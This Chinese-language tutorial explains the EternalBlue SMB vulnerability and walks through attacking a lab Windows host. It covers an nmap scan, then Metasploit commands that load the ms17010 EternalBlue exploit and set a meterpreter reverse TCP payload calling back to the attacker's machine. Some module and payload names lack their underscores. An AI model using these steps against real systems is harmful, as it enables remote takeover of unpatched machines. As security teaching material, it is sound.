一、基础知识介绍:
-
何为永恒之蓝?
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 -
什么是SMB协议?
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
二、攻击步骤:
- 确定攻击目标
1.1 使用kali打开nmap扫描目标主机。使用nmap执行命令 nmap -sS -A 192.168.17.149 -sS(使用SYN扫描),-A(启用操作系统检测和版本检测)。
根据我们的扫描结果可以大致判断该系统可能存在永恒之蓝漏洞。
- 攻击步骤
2.1 执行命令msfconsole打开metasploit。
2.2 执行命令search ms17010查询我们所需要的攻击模块。
2.3 找到我们需要的攻击模块后执行命令 use exploit/windows/smb/ms17010eternalblue
2.4 执行命令search payload查找我们需要的payload。
2.5 接下来我们利用该payload 执行命令set payload windows/x64/meterpreter/reversetcp。
2.6 执行命令show options来查看我们所需要设置的参数。其中RHOSTS(被攻击计算机IP)和LHOST(自己kali IP)是需要自己设置。
2.7 执行命令:set LHOST 192.168.17.148,set RHOSTS 192.168.17.149即可。
2.8 在设置好一切之后只需要执行命令exploit即可自动开始攻击。出现截图中的回显时就表示已经攻击成功了。